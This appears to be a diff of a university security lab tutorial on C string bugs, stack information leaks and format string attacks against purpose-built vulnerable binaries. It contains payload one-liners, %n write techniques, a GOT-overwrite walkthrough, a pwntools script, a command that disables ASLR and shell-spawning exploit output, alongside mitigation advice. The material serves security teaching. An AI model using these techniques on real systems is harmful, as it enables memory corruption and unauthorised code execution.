`old rbp` leak and then the address of the `my_main()` return address. - - - -See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. 
- - - -In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: - -``` {.code} -$ python exploit.py -[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead -[+] Starting local process './info_leak': pid 6422 -[*] old_rbp is 0x7fffffffdd40 -[*] return address is located at is 0x7fffffffdd38 -[*] Switching to interactive mode -Returning from main! -$ id -uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) -``` - - - -The rule of thumb is: **Always know your string length.** - - -#### Format String Attacks ---------------------- - - -We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. - -Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. - -The definition of `printf`: - -``` {.code .bash} -int printf(const char *format, ...); -``` - -Let\'s recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): - -- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format - - -- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address - - -- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard. - - -- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. -::: - -### Example 2 - -``` {.code .C} -printf(my_string); -``` - -The above snippet is a good example of why ignoring compile time warnings is dangerous. 
The given example is easily detected by a static checker. - -Try to think about: - -- The peculiarities of `printf` (variable number of arguments) - - -- Where `printf` stores its arguments (*hint*: on the stack) - - -- What happens when `my_string` is `"%x"` - - -- How matching between format strings (e.g. the one above) and arguments is enforced (*hint*: it\'s not) and what happens in general when the number of arguments doesn\'t match the number of format specifiers - - -- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) - -::: - -### Example 3 - -We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). -Some of them may be used for information leaking and for attacks such as format string attacks. - -Go into `printf-features/` subfolder and browse the `printf-features.c` file. Compile the executable file using: - -``` {.code .bash} -make -``` - -and then run the resulting executable file using - -``` {.code .bash} -./printf-features -``` - -Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. We will make use of the `%n` feature that allows memory writes, a requirement for attacks. -::: - -### Basic Format String Attack {#basic_format_string_attack .sectionedit11} - -You will now do a basic format string attack using the `03-basic-format-string/` subfolder. The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. - -You need to use `%n` to overwrite the value of the `v` variable to `0x300`. You have to do three steps: - -1.Determine the address of the `v` variable using `nm`. - - -2.Determine the `n`-th parameter of `printf()` that you can write to using `%n`. 
The `buffer` variable will have to be that parameter; you will store the address of the `v` variable in the `buffer` variable. - - -3.Construct a format string that enables the attack; the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. - - -For the second step let\'s run the program multiple times and figure out where the `buffer` address starts. We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. - -``` {.code} -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 -``` - -In the last run we get the `4141414141414141` representation of `AAAAAAAA`. That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: - -``` {.code} -$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c -162 -``` - -We need that number to be `0x300`. You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. 
See how much extra room you need and see if you reach `0x300` bytes. - - -The construct needn\'t use a multiple of `8` for length. You may use the `%32llx` or `%33llx` or `%42llx`. The numeric argument states the length of the print output. - -After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. - - -When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - - -After you write 0x300 chars in v, you should obtain shell - -``` {.code} -$ python exploit64.py -[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead -[+] Starting local process './basic_format_string': pid 20785 -[*] Switching to interactive mode - 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 -$ -``` - - -### Extra: Format String Attack {#extraformat_string_attack .sectionedit12} - - -Go to the `04-format-string/` subfolder. In this task you will be working with a **32-bit binary**. - -The goal of this task is to call `my_evil_func` again. This task is also tutorial based. - -``` {.code .C} -int -main(int argc, char *argv[]) -{ - printf(argv[1]); - printf("\nThis is the most useless and insecure program!\n"); - return 0; -} -``` - - -#### Transform Format String Attack to a Memory Write {#transform_format_string_attack_to_a_memory_write} - - -Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. - -``` {.code .bash} -$ ./format "%08x %08x %08x %08x" -00000000 f759d4d3 00000002 ffd59bd4 -This is the most useless and insecure program! -``` - -The values starting with 0xf are very likely pointers. 
Again, we can use this vulnerability as a information leakage. But we want more. - -Another useful format for us is `%m$` followed by any normal format selector. Which means that the `m`th parameter is used as an input for the following format. `%10$08x` will print the `10`th paramater with `%08x`. This allows us to do a precise access of the stack. - -Example: - -``` {.code .bash} -$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" -00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 -This is the most useless and insecure program! -``` - -Note the equivalence between formats. - -Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. - -``` {.code .bash} -$ ./format "$(python -c 'print("%08x\n" * 10000)')" -``` - -Depending on your setup you should be able to view the hex -representation of the string "%08x\\n". - -**Why do we need our own buffer?** Remember the `%n` format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value. - -The next steps are done with ASLR disabled. In order to disable ASLR, -please run - -``` {.code .bash} -echo 0 | sudo tee /proc/sys/kernel/randomize_va_space -``` - -By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts - -``` {.code .bash} -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head -10: ffffc410 -52: ffffcc41 -72: ffffcf41 -175: 44434241 -``` - - -Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference pwntools script to write your exploit. The code is equivalent to the above one-liner. 
- -``` {.code .python} -#!/usr/bin/env python3 -  -from pwn import * -  -stack_items = 200 -  -pad = b"ABCD" -val_fmt = b"%08x\n " -# add a \n at the end for consistency with the command line run -fmt = pad + val_fmt * stack_items + b"\n" -  -io = process(["./format", fmt]) -  -io.interactive() -``` - -Then call the `format` using: - -``` {.code} -$ python exploit.py -``` - -One idea is to keep things in multiple of 4, like "%08x \\n". If you are looking at line `175` we have `44434241` which is the base 16 representation of `“ABCD”` (because it\'s little endian). Note, you can add as many format strings you want, the start of the buffer will be the same (more or less). - -We can compress our buffer by specifying the position of the argument. - -``` {.code .bash} -$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') -ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 -This is the most useless and insecure program! -``` - - -`b”AAAAAAAA” * 199` is added to maintain the length of the original string, otherwise the offset might change. - - -You can see that the last information is our b"ABCD" string printed with `%08x` this means that we know where our buffer is. - - -You need to enable core dumps in order to reproduce the steps below: - -``` {.code} -$ ulimit -c unlimited -``` - -The steps below work an a given version of libc and a given system. It\'s why the instruction that causes the fault is - -``` {.code} -mov %edx,(%eax) -``` - -or the equivalent in Intel syntax - -``` {.code} -mov DWORD PTR [eax], edx -``` - -It may be different on your system, for example `edx` may be replaced by `esi`, cuch as - -``` {.code} -mov DWORD PTR [eax], esi -``` - -Update the explanations below accordingly. - -Remove any core files you may have generated before testing yourprogram: - -``` {.code} -rm -f core -``` - -We can replace `%08x` with `%n` this should lead to segmentation fault. 
- -``` {.code .bash} -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" -Segmentation fault (core dumped) -$ gdb ./format -c core -... -Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. -Program terminated with signal 11, Segmentation fault. -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -(gdb) bt -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 -#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 -(gdb) x/i $eip -=> 0xf7e580a2 : mov %edx,(%eax) -(gdb) info registers $edx $eax -edx 0x202 1596 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Bingo. We have memory write. The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. The value 1596 is the amount of data wrote so far by `printf`(`“ABCD” + 199 * “AAAAAAAA”`). - -Right now, our input string has 1605 bytes (1604 with a `\n` at the end). But we can further compress it, thus making the value that we write independent of the length of the input. - -``` {.code .bash} -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write("ABCD" + "A" * 1588 + "%99x" + "%126$08n")')" -Segmentation fault (core dumped) -$ gdb ./format -c core -(gdb) info registers $edx $eax -edx 0x261 1691 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Here we managed to write 1691 (4+1588+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. You can try this by yourself. - -**How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don\'t need this; moreover specifying a very large padding is not always feasible, think what happens when printing with `snprintf`. 255 should be enough. 
- -Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. - -Lets first display the address. We are using the address `0x804c014`. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts. - -Check the `exploit.py` script from the task directory, read the commends and understand what it does. - -``` {.code .bash} -$ python exploit.py -[*] 'format' - Arch: i386-32-little - RELRO: Partial RELRO - Stack: No canary found - NX: NX enabled - PIE: No PIE (0x8048000) -[+] Starting local process './format': pid 29030 -[*] Switching to interactive mode -[*] Process './format' stopped with exit code 0 (pid 29030) -\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... -This is the most useless and insecure program! -``` - -The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which is the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. - -If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. - -We want to put the value `0x080491a6`. - -``` {.code .bash} -$ objdump -d ./format | grep my_evil -080491a6 : -``` - - -As `%n` writes how many characters have been printed until it is reached, each `%n` will print an incrementally larger value. We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte. 
For example, after writing `0xa6` we can write `0x0191`: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) - -Also, the `%n` count doesn\'t reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of: - -`<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n` - -As mentioned earlier above, instead writing N bytes `“A” * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. - - -Bonus task** Can you get a shell? (Assume ASLR is disabled). - -#### Mitigation and Recommendations ------------------------------- - - -1. Manage the string length carefully - - -2. Don\'t use `gets`. With `gets` there is no way of knowing how much data was read - - -3. Use string functions with `n` parameter, whenever a non constant string is involved. i.e. `strnprintf`, `strncat`. - - -4. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte. - - -5. Use `wcstr*` functions when dealing with wide char strings. - -6. Don\'t trust the user! - - -#### Real life Examples ------------------- - -- [Heartbleed](http://xkcd.com/1354/ "http://xkcd.com/1354/") -Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/ "http://www.cvedetails.com/cve/CVE-2013-2851/"). The fix is [here](http://marc.info/?l=linux-kernel&m=137055204522556&w=2 "http://marc.info/?l=linux-kernel&m=137055204522556&w=2"). More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609 "http://www.intelligentexploit.com/view-details-ascii.html?id=16609"). - -- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/ "http://www.cvedetails.com/cve/CVE-2012-1851/"). - -- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369 "http://www.cvedetails.com/cve/CVE-2012-2369"). 
The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1 "https://bugzilla.novell.com/show_bug.cgi?id=762498#c1") - -### Resources ---------- -[Secure Coding in C and C++](http://www.cert.org/books/secure-coding/ "http://www.cert.org/books/secure-coding/") -[String representation in C](http://www.informit.com/articles/article.aspx?p=2036582 "http://www.informit.com/articles/article.aspx?p=2036582") -[Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking "https://www.owasp.org/index.php/Improper_string_length_checking") -[Format String definition](http://cwe.mitre.org/data/definitions/134.html "http://cwe.mitre.org/data/definitions/134.html") -[Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack "https://www.owasp.org/index.php/Format_string_attack") -[Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String "http://projects.webappsec.org/w/page/13246926/Format%20String") -[strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html "http://www.gratisoft.us/todd/papers/strlcpy.html") - This resource is useful to understand some of the string manipulation problems. - ------------------------------------------------------------------------- - -Except where otherwise noted, content on this page is licensed under the -following license: [CC Attribution-Share Alike 4.0 International](https://creativecommons.org/licenses/by-sa/4.0/deed.en) +# Information Leaks + +## Introduction + +### Objectives & Rationale + +This is a tutorial based lab. +Throughout this lab you will learn about frequent errors that occur when handling strings. +This tutorial is focused on the C language. +Generally, OOP languages (like Java, C#,C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. + +### What is a String? 
+ +Conceptually, a string is a sequence of characters. +The representation of a string can be done in multiple ways. +One of the ways is to represent a string as a contiguous memory buffer. +Each character is **encoded** in some way. +For example, the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8 bits at a time in a byte, an ASCII character is stored in one byte. + +The type for representing an ASCII character in C is `char` and it uses one byte. +As a side note, `sizeof(char) == 1` is the only guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. + +Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). +The idea is that in order to represent a Unicode string, **more than one** byte may be needed for **one** character. +`char16_t`, `char32_t` were introduced in the C standard to represent these strings. +The C language also has another type, called `wchar_t`, which is implementation-defined and should not be used to represent Unicode characters. + +Our tutorial will focus on ASCII strings, where each character is represented in one byte. +We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. + +You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). + +Inside a Unix terminal, issue the command: + +```console +man ascii +``` + +### Length Management + +In C, the length of an ASCII string is given by its contents. +An ASCII string ends with a `0` value byte called the `NUL` byte. +Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends.
+As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. + +## 1. Basic Info Leak (tutorial) + +Enter the `01-basic-info-leak/` subfolder. +It's a basic information leak example. + +In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. +We should be careful with this buffer. +If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). +Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most platforms, we will start accessing the content of the stack. +After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. +This information is copied into `my_string`. +As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. + +We can test this using: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� +``` + +In order to check the hexadecimal values of the leak, we pipe the output +through `xxd`: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak | xxd +00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: d066 57b4 fc7f 0a .fW.... +``` + +We have leaked one value above: + +- the lower non-0 bytes of the old/stored `rbp` value (right after the buffer) +- `0x7ffcb45766d0` (it's a little endian architecture); + it will differ on your system + +The return address usually doesn't change (except for executables with PIE, *Position Independent Executable* support). +But assuming ASLR is enabled, the `rbp` value changes at each run. +If we leak it we have a basic address that we can toy around to leak or overwrite other values. + +## 2. Information Leak + +We will now show how improper string handling will lead to information leaks from the memory. 
+For this, please access the `02-info-leak/` subfolder. +Please browse the `info-leak.c` source code file. + +The snippet below is the relevant code snippet. +The goal is to call the `my_evil_func()` function. +One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. +If you have memory writes, then getting code execution is a matter of getting things right. +In this task we are assuming that we have memory write (i.e. we can write any value at any address). +You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: + +```c +#define NAME_SZ 32 +  +static void read_name(char *name) +{ + memset(name, 0, NAME_SZ); + read(0, name, NAME_SZ); + //name[NAME_SZ-1] = 0; +} +  +static void my_main(void) +{ + char name[NAME_SZ]; +  + read_name(name); + printf("hello %s, what address to modify and with what value?\n", name); + fflush(stdout); + my_memory_write(); + printf("Returning from main!\n"); +} +``` + +What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. +If we provide it `32` bytes it won't be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. + +### Exploiting the Memory Write Using the Info Leak + +Let's first try to see how the program works: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak +hello AAAAAAAAAA, what address to modify and with what value? +``` + +The binary wants an input from the user using the `read()` library call as we can see below: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak +read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 +read(0, "AAAAAAAAAA", 32) = 10 +hello AAAAAAAAAA, what address to modify and with what value? 
+read(0, "", 4) = 0 ++++ exited with 255 +++ +``` + +The input is read using the `read()` system call. +The first read expects 32 bytes. +You can see already that there's another `read()` call. +That one is the first `read()` call in the `my_memory_write()` function. + +As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. +Let's see how that goes: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak +hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? +  +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd +00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo +00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh +00000050: 6174 2076 616c 7565 3f0a at value?. +``` + +We see we have an information leak. +We leak one piece of data above: `0x7fffffffdcf0`. +If we run multiple times we can see that the values for the first piece of information differs: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +``` + +The variable part is related to a stack address (it starts with `0x7f`); +it varies because ASLR is enabled. +We want to look more carefully using GDB and figure out what the variable value represents: + +```console +$ gdb -q ./info_leak +Reading symbols from ./info_leak...done. +gdb-peda$ b my_main +Breakpoint 1 at 0x400560 +gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') +Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') +[...] +  +# Do next instructions until after the call to printf. +gdb-peda$ ni +.... 
+  +gdb-peda$ x/12g name +0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa +gdb-peda$ x/2i 0x004007aa + 0x4007aa : mov edi,0x4008bc + 0x4007af : call 0x400550 +gdb-peda$ pdis main +Dump of assembler code for function main: + 0x00000000004007a1 <+0>: push rbp + 0x00000000004007a2 <+1>: mov rbp,rsp + 0x00000000004007a5 <+4>: call 0x400756 + 0x00000000004007aa <+9>: mov edi,0x4008bc + 0x00000000004007af <+14>: call 0x400550 + 0x00000000004007b4 <+19>: mov eax,0x0 + 0x00000000004007b9 <+24>: pop rbp + 0x00000000004007ba <+25>: ret +End of assembler dump. +gdb-peda$ +``` + +From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). + +In 32-bit program there would (usually) be 2 leaked values: + +1. The old `ebp` +1. The return address of the function + +This happens if the values of the old `ebp` and the return address don't have any `x00` bytes. + +In the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. + +When we leak the two values we are able to retrieve the stored `rbp` value. +In the above run the value of `rbp` is `0x00007fffffffdc50`. +We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. +We have the situation in the below diagram: + +![Stak Information Leak](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) + +We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. + +In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. 
+The address where the `my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. +By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. + +In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the conveniently (but not realistically) placed `my_memory_write()` function. +The `my_memory_write()` allows the user to write arbitrary values to arbitrary memory addresses. + +Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. + +Same as above, use `nm` to determine address of the `my_evil_func()` function. +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. + +See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. + +In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: + +```console +$ python exploit.py +[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead +[+] Starting local process './info_leak': pid 6422 +[*] old_rbp is 0x7fffffffdd40 +[*] return address is located at is 0x7fffffffdd38 +[*] Switching to interactive mode +Returning from main! 
+$ id +uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) +``` + +The rule of thumb is: **Always know your string length.** + +### Format String Attacks + +We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. + +Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. + +The definition of `printf`: + +```c +int printf(const char *format, ...); +``` + +Let's recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): + +- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address +- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). +This format is not widely used but it is in the C standard. +- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. + +## Example 2 + +```c +printf(my_string); +``` + +The above snippet is a good example of why ignoring compile time warnings is dangerous. +The given example is easily detected by a static checker. + +Try to think about: + +- The peculiarities of `printf` (variable number of arguments) +- Where `printf` stores its arguments (*hint*: on the stack) +- What happens when `my_string` is `"%x"` +- How matching between format strings (e.g. 
the one above) and arguments is enforced (*hint*: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers +- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) + +## Example 3 + +We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). +Some of them may be used for information leaking and for attacks such as format string attacks. + +Go into `printf-features/` subfolder and browse the `printf-features.c` file. +Compile the executable file using: + +```console +make +``` + +and then run the resulting executable file using + +```console +./printf-features +``` + +Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. +We will make use of the `%n` feature that allows memory writes, a requirement for attacks. + +## Basic Format String Attack + +You will now do a basic format string attack using the `03-basic-format-string/` subfolder. +The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. + +You need to use `%n` to overwrite the value of the `v` variable to `0x300`. +You have to do three steps: + +1. Determine the address of the `v` variable using `nm`. + +1. Determine the `n`-th parameter of `printf()` that you can write to using `%n`. + The `buffer` variable will have to be that parameter; + you will store the address of the `v` variable in the `buffer` variable. + +1. Construct a format string that enables the attack; + the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. + +For the second step let's run the program multiple times and figure out where the `buffer` address starts. 
+We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. + +```console +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 +``` + +In the last run we get the `4141414141414141` representation of `AAAAAAAA`. +That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: + +```console +$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c +162 +``` + +We need that number to be `0x300`. +You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. +See how much extra room you need and see if you reach `0x300` bytes. + +The construct needn't use a multiple of `8` for length. +You may use the `%32llx` or `%33llx` or `%42llx`. +The numeric argument states the length of the print output. + +After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. 
